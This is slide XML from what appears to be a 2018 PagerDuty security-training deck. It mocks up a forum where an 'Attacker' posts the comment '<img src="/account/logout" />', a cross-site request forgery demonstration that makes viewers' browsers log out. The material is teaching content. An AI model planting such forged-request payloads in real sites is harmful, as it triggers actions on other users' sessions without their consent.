              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1648" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1649" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940505" y="2661621"/>
            <a:ext cx="12502990" cy="7890396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1650" name="pd-user-blank.png" descr="pd-user-blank.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299773" y="3937169"/>
            <a:ext cx="1113348" cy="1113348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1651" name="Let’s talk about something."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7718783" y="4338223"/>
            <a:ext cx="4982965"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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let’s talk about something.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1652" name="pd-user-blank.png" descr="pd-user-blank.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299773" y="5187325"/>
            <a:ext cx="1113348" cy="1113348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1653" name="Post your favorite pictures of dogs!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7687918" y="5545841"/>
            <a:ext cx="6412707"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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Post your favorite pictures of dogs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1654" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6322405" y="7139521"/>
            <a:ext cx="11879547" cy="3020820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1655" name="Comment:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332159" y="6621462"/>
            <a:ext cx="1444254" cy="473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200">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Comment:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1656" name="Rich says:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581656" y="3879250"/>
            <a:ext cx="1444254" cy="473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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rich says:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1657" name="Rich says:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581656" y="5137628"/>
            <a:ext cx="1444254" cy="473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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rich says:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1658" name="Logged in as: Attacker"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13731267" y="2804658"/>
            <a:ext cx="4074034"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r">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Logged in as: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C62818"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1659" name="hacker-icon.png" descr="hacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17838346" y="2881453"/>
            <a:ext cx="446443" cy="446443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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3" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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664"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665" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1666" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1667" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940505" y="2661621"/>
            <a:ext cx="12502990" cy="7890396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1668" name="pd-user-blank-corrected.png" descr="pd-user-blank-corrected.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299773" y="3937169"/>
            <a:ext cx="1113348" cy="1113348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1669" name="pd-user-blank-corrected.png" descr="pd-user-blank-corrected.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299773" y="5187325"/>
            <a:ext cx="1113348" cy="1113348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1670" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6322405" y="7139521"/>
            <a:ext cx="11879547" cy="3020819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1671" name="&lt;img src=&quot;/account/logout&quot; /&gt;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6394192" y="7223857"/>
            <a:ext cx="7760172"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4200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>&lt;img src="/account/logout" /&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1672" name="Let’s talk about something."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7718783" y="4338223"/>
            <a:ext cx="4982965"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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let’s talk about something.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1673" name="Post your favorite pictures of dogs!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7687918" y="5545841"/>
            <a:ext cx="6412707"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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Post your favorite pictures of dogs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1674" name="Comment:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332159" y="6621462"/>
            <a:ext cx="1444254" cy="473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200">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Comment:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1675" name="Rich says:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581656" y="3879250"/>
            <a:ext cx="1444254" cy="473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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rich says:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1676" name="Rich says:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581656" y="5137628"/>
            <a:ext cx="1444254" cy="473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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rich says:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1677" name="Logged in as: Attacker"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13731267" y="2804658"/>
            <a:ext cx="4074034"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r">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Logged in as: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C62818"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1678" name="hacker-icon.png" descr="hacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17838346" y="2881453"/>
            <a:ext cx="446443" cy="44644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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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71" grpId="1"/>
    </p:bldLst>
  </p:timing>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2" name="What does the user see?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What does the user see?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1683" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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684"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685" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1686" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1687" name="pd-user-blank.png" descr="pd-user-blank.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10369351" y="8255940"/>
            <a:ext cx="3645399" cy="3645399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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692"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693" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1694" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1695" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940505" y="2661621"/>
            <a:ext cx="12502990" cy="7890396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1696" name="pd-user-blank.png" descr="pd-user-blank.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299773" y="3937169"/>
            <a:ext cx="1113348" cy="1113348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1697" name="pd-user-blank.png" descr="pd-user-blank.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299773" y="5187325"/>
            <a:ext cx="1113348" cy="1113348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1698" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6322405" y="8211084"/>
            <a:ext cx="11879547" cy="1912326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1699" name="hacker-icon.png" descr="hacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299773" y="6437481"/>
            <a:ext cx="1113348" cy="1113348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1700" name="Attacker says:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7650666" y="6474338"/>
            <a:ext cx="1910148" cy="473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2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:t> says:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1701" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7644103" y="6923964"/>
            <a:ext cx="464344" cy="446485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1702" name="Logged in as: Rich"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14430387" y="2804658"/>
            <a:ext cx="3374914"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r">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Logged in as: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1703" name="Let’s talk about something."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7718783" y="4338223"/>
            <a:ext cx="4982965"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200">
